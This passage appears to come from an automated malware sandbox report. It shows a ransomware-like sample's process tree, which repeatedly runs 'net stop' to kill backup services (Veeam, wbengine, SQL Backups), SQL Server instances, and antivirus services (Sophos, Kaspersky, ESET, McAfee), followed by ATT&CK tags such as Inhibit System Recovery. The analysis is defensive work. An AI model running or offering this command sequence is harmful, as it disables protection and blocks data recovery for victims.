- - C:\Windows\SysWOW64\net.exe
    net stop ShMonitor /y
    3⤵
    PID:5112
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop ShMonitor /y
      4⤵
      PID:4176
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop Smcinst /y
  2⤵
  PID:4208
- - C:\Windows\SysWOW64\net.exe
    net stop Smcinst /y
    3⤵
    PID:4184
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop Smcinst /y
      4⤵
      PID:4320
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop SmcService /y
  2⤵
  PID:4204
- - C:\Windows\SysWOW64\net.exe
    net stop SmcService /y
    3⤵
    PID:4408
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SmcService /y
      4⤵
      PID:4416
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop SMTPSvc /y
  2⤵
  PID:4308
- - C:\Windows\SysWOW64\net.exe
    net stop SMTPSvc /y
    3⤵
    PID:4428
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SMTPSvc /y
      4⤵
      PID:4488
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop SQLAgent$BKUPEXEC /y
  2⤵
  PID:4368
- - C:\Windows\SysWOW64\net.exe
    net stop SQLAgent$BKUPEXEC /y
    3⤵
    PID:4528
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y
      4⤵
      PID:4572
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop SQLAgent$ECWDB2 /y
  2⤵
  PID:4580
- - C:\Windows\SysWOW64\net.exe
    net stop SQLAgent$ECWDB2 /y
    3⤵
    PID:4624
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y
      4⤵
      PID:4712
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop SQLAgent$PRACTTICEBGC /y
  2⤵
  PID:4796
- - C:\Windows\SysWOW64\net.exe
    net stop SQLAgent$PRACTTICEBGC /y
    3⤵
    PID:4692
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y
      4⤵
      PID:4856
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop SQLAgent$PRACTTICEMGT /y
  2⤵
  PID:4868
- - C:\Windows\SysWOW64\net.exe
    net stop SQLAgent$PRACTTICEMGT /y
    3⤵
    PID:4824
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y
      4⤵
      PID:4920
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop SQLAgent$PROFXENGAGEMENT /y
  2⤵
  PID:4896
- - C:\Windows\SysWOW64\net.exe
    net stop SQLAgent$PROFXENGAGEMENT /y
    3⤵
    PID:4968
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y
      4⤵
      PID:5008
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop SQLAgent$SBSMONITORING /y
  2⤵
  PID:5000
- - C:\Windows\SysWOW64\net.exe
    net stop SQLAgent$SBSMONITORING /y
    3⤵
    PID:5056
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y
      4⤵
      PID:5048
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop SQLAgent$SHAREPOINT /y
  2⤵
  PID:1636
- - C:\Windows\SysWOW64\net.exe
    net stop SQLAgent$SHAREPOINT /y
    3⤵
    PID:4108
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y
      4⤵
      PID:2160
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop SQLAgent$SQL_2008 /y
  2⤵
  PID:4284
- - C:\Windows\SysWOW64\net.exe
    net stop SQLAgent$SQL_2008 /y
    3⤵
    PID:4144
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y
      4⤵
      PID:4376
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop SQLAgent$SYSTEM_BGC /y
  2⤵
  PID:4404
- - C:\Windows\SysWOW64\net.exe
    net stop SQLAgent$SYSTEM_BGC /y
    3⤵
    PID:4252
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y
      4⤵
      PID:4432
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop SQLAgent$TPS /y
  2⤵
  PID:4476
- - C:\Windows\SysWOW64\net.exe
    net stop SQLAgent$TPS /y
    3⤵
    PID:4568
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$TPS /y
      4⤵
      PID:4436
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop SQLAgent$TPSAMA /y
  2⤵
  PID:4508
- - C:\Windows\SysWOW64\net.exe
    net stop SQLAgent$TPSAMA /y
    3⤵
    PID:4800
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$TPSAMA /y
      4⤵
      PID:4616
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop SQLAgent$VEEAMSQL2008R2 /y
  2⤵
  PID:4696
- - C:\Windows\SysWOW64\net.exe
    net stop SQLAgent$VEEAMSQL2008R2 /y
    3⤵
    PID:4760
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
      4⤵
      PID:4656
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop SQLAgent$VEEAMSQL2012 /y
  2⤵
  PID:4912
- - C:\Windows\SysWOW64\net.exe
    net stop SQLAgent$VEEAMSQL2012 /y
    3⤵
    PID:4756
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y
      4⤵
      PID:4888
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop SQLBrowser /y
  2⤵
  PID:5024
- - C:\Windows\SysWOW64\net.exe
    net stop SQLBrowser /y
    3⤵
    PID:4892
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLBrowser /y
      4⤵
      PID:5100
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop SQLSafeOLRService /y
  2⤵
  PID:5084
- - C:\Windows\SysWOW64\net.exe
    net stop SQLSafeOLRService /y
    3⤵
    PID:4264
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLSafeOLRService /y
      4⤵
      PID:4136
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop SQLSERVERAGENT /y
  2⤵
  PID:2700
- - C:\Windows\SysWOW64\net.exe
    net stop SQLSERVERAGENT /y
    3⤵
    PID:4420
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLSERVERAGENT /y
      4⤵
      PID:4180
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop SQLTELEMETRY /y
  2⤵
  PID:4244
- - C:\Windows\SysWOW64\net.exe
    net stop SQLTELEMETRY /y
    3⤵
    PID:4348
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLTELEMETRY /y
      4⤵
      PID:4392
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop SQLTELEMETRY$ECWDB2 /y
  2⤵
  PID:4484
- - C:\Windows\SysWOW64\net.exe
    net stop SQLTELEMETRY$ECWDB2 /y
    3⤵
    PID:4520
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y
      4⤵
      PID:4292
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop SQLWriter /y
  2⤵
  PID:4596
- - C:\Windows\SysWOW64\net.exe
    net stop SQLWriter /y
    3⤵
    PID:4628
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLWriter /y
      4⤵
      PID:4684
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop VeeamBackupSvc /y
  2⤵
  PID:4792
- - C:\Windows\SysWOW64\net.exe
    net stop VeeamBackupSvc /y
    3⤵
    PID:4924
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop VeeamBackupSvc /y
      4⤵
      PID:5028
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop VeeamBrokerSvc /y
  2⤵
  PID:4808
- - C:\Windows\SysWOW64\net.exe
    net stop VeeamBrokerSvc /y
    3⤵
    PID:5096
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop VeeamBrokerSvc /y
      4⤵
      PID:5064
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop VeeamCatalogSvc /y
  2⤵
  PID:5004
- - C:\Windows\SysWOW64\net.exe
    net stop VeeamCatalogSvc /y
    3⤵
    PID:3052
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop VeeamCatalogSvc /y
      4⤵
      PID:5104
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop VeeamCloudSvc /y
  2⤵
  PID:4140
- - C:\Windows\SysWOW64\net.exe
    net stop VeeamCloudSvc /y
    3⤵
    PID:4352
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop VeeamCloudSvc /y
      4⤵
      PID:4328
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop VeeamDeploymentService /y
  2⤵
  PID:4296
- - C:\Windows\SysWOW64\net.exe
    net stop VeeamDeploymentService /y
    3⤵
    PID:4336
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop VeeamDeploymentService /y
      4⤵
      PID:4532
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop VeeamDeploySvc /y
  2⤵
  PID:4356
- - C:\Windows\SysWOW64\net.exe
    net stop VeeamDeploySvc /y
    3⤵
    PID:4600
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop VeeamDeploySvc /y
      4⤵
      PID:4740
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop VeeamEnterpriseManagerSvc /y
  2⤵
  PID:4512
- - C:\Windows\SysWOW64\net.exe
    net stop VeeamEnterpriseManagerSvc /y
    3⤵
    PID:4748
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y
      4⤵
      PID:4960
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop VeeamMountSvc /y
  2⤵
  PID:4844
- - C:\Windows\SysWOW64\net.exe
    net stop VeeamMountSvc /y
    3⤵
    PID:4816
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop VeeamMountSvc /y
      4⤵
      PID:4976
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop VeeamNFSSvc /y
  2⤵
  PID:4984
- - C:\Windows\SysWOW64\net.exe
    net stop VeeamNFSSvc /y
    3⤵
    PID:4232
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop VeeamNFSSvc /y
      4⤵
      PID:4156
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop VeeamRESTSvc /y
  2⤵
  PID:4384
- - C:\Windows\SysWOW64\net.exe
    net stop VeeamRESTSvc /y
    3⤵
    PID:4256
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop VeeamRESTSvc /y
      4⤵
      PID:4240
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop VeeamTransportSvc /y
  2⤵
  PID:4668
- - C:\Windows\SysWOW64\net.exe
    net stop VeeamTransportSvc /y
    3⤵
    PID:4220
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop VeeamTransportSvc /y
      4⤵
      PID:4852
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop W3Svc /y
  2⤵
  PID:4776
- - C:\Windows\SysWOW64\net.exe
    net stop W3Svc /y
    3⤵
    PID:4700
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop W3Svc /y
      4⤵
      PID:4932
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop wbengine /y
  2⤵
  PID:4848
- - C:\Windows\SysWOW64\net.exe
    net stop wbengine /y
    3⤵
    PID:4884
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop wbengine /y
      4⤵
      PID:5060
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop WRSVC /y
  2⤵
  PID:4124
- - C:\Windows\SysWOW64\net.exe
    net stop WRSVC /y
    3⤵
    PID:2428
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop WRSVC /y
      4⤵
      PID:4964
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MSSQL$VEEAMSQL2008R2 /y
  2⤵
  PID:4276
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQL$VEEAMSQL2008R2 /y
    3⤵
    PID:4216
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
      4⤵
      PID:4188
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop SQLAgent$VEEAMSQL2008R2 /y
  2⤵
  PID:4680
- - C:\Windows\SysWOW64\net.exe
    net stop SQLAgent$VEEAMSQL2008R2 /y
    3⤵
    PID:4456
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
      4⤵
      PID:4768
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop VeeamHvIntegrationSvc /y
  2⤵
  PID:4828
- - C:\Windows\SysWOW64\net.exe
    net stop VeeamHvIntegrationSvc /y
    3⤵
    PID:4704
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y
      4⤵
      PID:4744
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop swi_update /y
  2⤵
  PID:4996
- - C:\Windows\SysWOW64\net.exe
    net stop swi_update /y
    3⤵
    PID:1304
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop swi_update /y
      4⤵
      PID:4132
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop SQLAgent$CXDB /y
  2⤵
  PID:4120
- - C:\Windows\SysWOW64\net.exe
    net stop SQLAgent$CXDB /y
    3⤵
    PID:4548
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$CXDB /y
      4⤵
      PID:4168
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop SQLAgent$CITRIX_METAFRAME /y
  2⤵
  PID:4660
- - C:\Windows\SysWOW64\net.exe
    net stop SQLAgent$CITRIX_METAFRAME /y
    3⤵
    PID:4440
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y
      4⤵
      PID:4196
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop "SQL Backups" /y
  2⤵
  PID:5080
- - C:\Windows\SysWOW64\net.exe
    net stop "SQL Backups" /y
    3⤵
    PID:4876
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop "SQL Backups" /y
      4⤵
      PID:4864
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MSSQL$PROD /y
  2⤵
  PID:4980
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQL$PROD /y
    3⤵
    PID:4908
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$PROD /y
      4⤵
      PID:4648
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop "Zoolz 2 Service" /y
  2⤵
  PID:4104
- - C:\Windows\SysWOW64\net.exe
    net stop "Zoolz 2 Service" /y
    3⤵
    PID:4452
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop "Zoolz 2 Service" /y
      4⤵
      PID:4472
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MSSQLServerADHelper /y
  2⤵
  PID:4640
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQLServerADHelper /y
    3⤵
    PID:4948
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQLServerADHelper /y
      4⤵
      PID:4564
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop SQLAgent$PROD /y
  2⤵
  PID:4972
- - C:\Windows\SysWOW64\net.exe
    net stop SQLAgent$PROD /y
    3⤵
    PID:4280
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$PROD /y
      4⤵
      PID:5092
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop msftesql$PROD /y
  2⤵
  PID:4940
- - C:\Windows\SysWOW64\net.exe
    net stop msftesql$PROD /y
    3⤵
    PID:4272
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop msftesql$PROD /y
      4⤵
      PID:4820
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop NetMsmqActivator /y
  2⤵
  PID:4788
- - C:\Windows\SysWOW64\net.exe
    net stop NetMsmqActivator /y
    3⤵
    PID:4832
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop NetMsmqActivator /y
      4⤵
      PID:4364
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop EhttpSrv /y
  2⤵
  PID:4340
- - C:\Windows\SysWOW64\net.exe
    net stop EhttpSrv /y
    3⤵
    PID:4736
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop EhttpSrv /y
      4⤵
      PID:4900
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop ekrn /y
  2⤵
  PID:4720
- - C:\Windows\SysWOW64\net.exe
    net stop ekrn /y
    3⤵
    PID:4236
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop ekrn /y
      4⤵
      PID:4732
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop ESHASRV /y
  2⤵
  PID:4112
- - C:\Windows\SysWOW64\net.exe
    net stop ESHASRV /y
    3⤵
    PID:5076
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop ESHASRV /y
      4⤵
      PID:5044
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MSSQL$SOPHOS /y
  2⤵
  PID:4560
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQL$SOPHOS /y
    3⤵
    PID:1064
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$SOPHOS /y
      4⤵
      PID:4540
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop SQLAgent$SOPHOS /y
  2⤵
  PID:4516
- - C:\Windows\SysWOW64\net.exe
    net stop SQLAgent$SOPHOS /y
    3⤵
    PID:4288
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$SOPHOS /y
      4⤵
      PID:5116
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop AVP /y
  2⤵
  PID:4644
- - C:\Windows\SysWOW64\net.exe
    net stop AVP /y
    3⤵
    PID:4224
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop AVP /y
      4⤵
      PID:4716
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop klnagent /y
  2⤵
  PID:4388
- - C:\Windows\SysWOW64\net.exe
    net stop klnagent /y
    3⤵
    PID:4524
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop klnagent /y
      4⤵
      PID:5036
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MSSQL$SQLEXPRESS /y
  2⤵
  PID:4312
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQL$SQLEXPRESS /y
    3⤵
    PID:4300
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y
      4⤵
      PID:4620
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop SQLAgent$SQLEXPRESS /y
  2⤵
  PID:4100
- - C:\Windows\SysWOW64\net.exe
    net stop SQLAgent$SQLEXPRESS /y
    3⤵
    PID:4468
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y
      4⤵
      PID:4664
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop wbengine /y
  2⤵
  PID:4752
- - C:\Windows\SysWOW64\net.exe
    net stop wbengine /y
    3⤵
    PID:4544
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop wbengine /y
      4⤵
      PID:4636
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop mfefire /y
  2⤵
  PID:5136
- - C:\Windows\SysWOW64\net.exe
    net stop mfefire /y
    3⤵
    PID:5172
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop mfefire /y
      4⤵
      PID:5192

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:496

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -s BITS
1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:5860

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File Deletion

T1107

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads